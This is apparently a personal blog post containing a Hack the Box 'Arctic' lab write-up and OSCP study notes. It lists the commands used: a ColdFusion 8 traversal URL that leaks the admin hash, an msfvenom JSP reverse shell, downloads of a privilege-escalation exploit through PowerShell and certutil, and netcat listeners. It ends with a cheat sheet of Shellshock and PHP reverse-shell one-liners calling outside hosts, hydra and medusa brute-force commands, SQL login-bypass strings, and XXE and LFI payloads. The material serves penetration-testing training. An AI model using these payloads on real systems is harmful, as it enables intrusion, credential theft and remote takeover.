HTB – Arctic

Today we are going to solve another CTF challenge “Arctic” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of vulnerability assessment. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Arctic is 10.10.10.11 so let’s initiate with nmap port enumeration.

c:\Users>jacco\nmap -sC -sV 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 19:46 W. Europe Summer Time
Nmap scan report for 10.10.10.11
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.40 seconds

Right off the bat port 8500 looks interesting. Let’s have a look in the browser.

8500

CFIDE

The administrator directory gives us a login for ColdFusion 8.

Login

Exploitation

After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. So we can grab the administrator hash using the directory traversal using the following URL:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

And we get this output in the browser.

HASH

So we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Using hash-identifier we see the hash is most likely SHA-1.

root@kali:~/htb/arctic# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Possible Hashs:
[+]  SHA-1

A quick Google search online yields the cracked password – happyday. Usually easiest to start here before firing up hashcat.

Inside of the login page there is an area that allows us to upload files via Scheduled Tasks under the Debugging & Logging Category.

ADMIN

The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell.

MAPPINGS

At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.

To generate a JSP shell, we use msfvenom and set our parameters accordingly.

root@kali:~/htb/arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
Payload size: 1496 byte

Now that we have our shell created let’s serve up the file from Kali using a python SimpleHTTPServer

root@kali:~/htb/arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Inside the ColdFusion admin console we configure three parameters for the scheduled task.

  • Set the URL to our webserver hosting the JSP shell
  • Check the box for Save output to a file
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

TASK

After submitting we run the task on demand under Actions, and we can see the 200 reponse on our python http server.

TASKRUN

Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp

root@kali:~/htb/arctic# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49212
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami & hostname
whoami & hostname
arctic\tolis
arctic

And we can grab the user.txt flag on tolis’ desktop.

Privilege Escalation

Tolis doesn’t seem to be an administrator on the system so we will need to escalate. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if its missing any patches.

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

From here we identify the box is running Server 2008 R2 and also has no patches installed according to the output under Hotfix(s). Great! Let’s see what exploits we can find. From here you can either Google, use Exploit-DB, searchsploit, or for Windows I like to use something called Windows Exploit Suggester which makes life easy. I won’t go into details on how to use it, check the github to see usage and what all you can feed into it.

After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.

https://www.exploit-db.com/exploits/14610/

The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has an alias name of Chimichurri as referenced on Exploit-DB so I also searched by that and was able to find a compiled exe on Github here. Note that normally you want compile things yourself but I wasn’t able to do so myself without installing a ton of stuff so I decided to forgo it. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters.

Once again we setup a python http server on Kali and to download to our target a simple powershell script will do the trick.

C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1

C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1

C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1

C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1

C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

alternatively use

C:\ColdFusion8\runtime\bin>certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
**** Online ****
000000 ...
017c00
CertUtil: -URLCache command completed successfully.

We verify the download, start a netcat listener, and run the exploit.

C:\ColdFusion8\runtime\bin>chimichurri.exe
chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\ColdFusion8\runtime\bin>chimichurri.exe 10.10.14.10 53
chimichurri.exe 10.10.14.10 53
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.11: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49897: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce6*****b90

Author : Jacco Straathof

Reference used : https://www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/

OSCP Journey – 1st month

Date: 02 June – 30 aug2019
PDF: 380/380
Videos: 149/149
Exercises: 32/42
Exploited Machines: 33
Unlocked Networks: 2

The PDF contains 380 pages that spread over 18 chapters. The video’s length is around 7 and half hours spread over 149 Videos. I spent around 30 hours doing the materials and exercises. There are five exercises that I decided to do it later since it requires to do it on the correct machines in the lab. The video and PDF fit together but the videos seem outdated and have some differences with the PDF. If you encounter any issues while following the syntax on course materials, use the syntax on the PDF one.

Exploited Machines (33):

ALICE
ALPHA
BETA
BARRY
BETHANY
BOB
BRUCE
BRETT
CORE
CORY
DJ
DOTTY
FC4
GAMMA
HELPDESK
HOTLINE
JD
JOE
KEVIN
KRAKEN
MAIL
MIKE
ORACLE
PAIN
PAYDAY
PHOENIX
RALPH
SEAN [FW-IT]
SHERLOCK
SUFFERANCE
SUSIE
TIMECLOCK [FW-DEV]
TOPHAT

My impression  is its simulates real-world scenario. So far all the exploit is known exploit and no puzzle or random guessing needed. All you need is proper enumeration to spot the vulnerability.

There are four hardest machines in the OSCP lab that known as The Big Four. Those machines are Pain, Sufferance, Gh0st and Humble.

LEARNED:

  • Using up arrow to get previous command in netcat
    – use rlwrap to wrap a readline history library around your netcat program. Another is to use socat which has readline built-in as an option.For example, if you were doing a telnet with netcat you might just say
    c:\PENTEST>revshell 192.168.1.21 9090
root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi
root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi
ATTACK FTP

ftp server :

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 
BRUTE FORCE SSH
hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22:22 - 22 -M ss 
SQL INJECTION
 sheet with the Burp Suite Intruder Module. This list is an extended version of SQL Login Bypass Cheat Sheet of Dr. Emin İslam TatlıIf (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
XXE
<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>
LFI

See the source of any php

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index
RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1
') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"
BRUTE FORCE WEB
hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie : PHPSESSID=bq8vrl6updklfdvv21reb8s63j"
htaccess brute force
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises, it’s a GEM. Even when you already familiar with most of the topics, it will become a refresher. When you attacking machines in the lab it will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete it. Sparing your time at the beginning for this can save your day later in the lab.
  • In course materials and exercises, some of the tools are outdated and have version issues with Offsec Kali VM. If you encounter any issues, search the problem on the Offsec forum. Most of them are known issues and there are solutions available there.
  • Don’t just do nothing waiting for Nmap scan finish. Make some guess like checking if web service opens using the browser, checking if FTP, SSH or any other common services open using NC and do some manual enumeration while waiting.
  • NMAP Scripts are powerful tools to check for vulnerability. Get familiar with it and play with the scripts. All of the scripts located in /usr/share/nmap/scripts/ directory.
  • Most of the public exploits won’t work without modifying it. It usually has hardcoded IP address and Path. Make sure you understand the exploit and change it as necessary.
  • When compiling exploit, compile it on the environment (OS/kernel) that as close as possible with the target machine. If the target machine didn’t have the compiler, the workaround could be downloading the same OS as target machine, install and compile it there, but it takes a lot of times. I found out that some of Vulnhub VM Machines that similar to OSCP can be used to compile the exploit too. I am using Kioptrix machines to compile the old exploit and it works so far. Saving time on downloading and installing new OS.
  • MSF is a powerful tool even though its restricted in the exam. Use MSF for post-exploitation, it makes your life easier to upload and download the file using Meterpreter shell. It also has many post-exploitation modules that really helpful.
  • For some of the straightforward machines, the methodology is simple: NMAP -> check service or software version for known vulnerability (searchsploit or google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Spare your time to make write up after you exploit a machine. It will make you understand better your current methodology and how to improve it. Someday you may also encounter similar machines and it will help you. I use CherryTree for documenting all.

Author: Jacco Straathof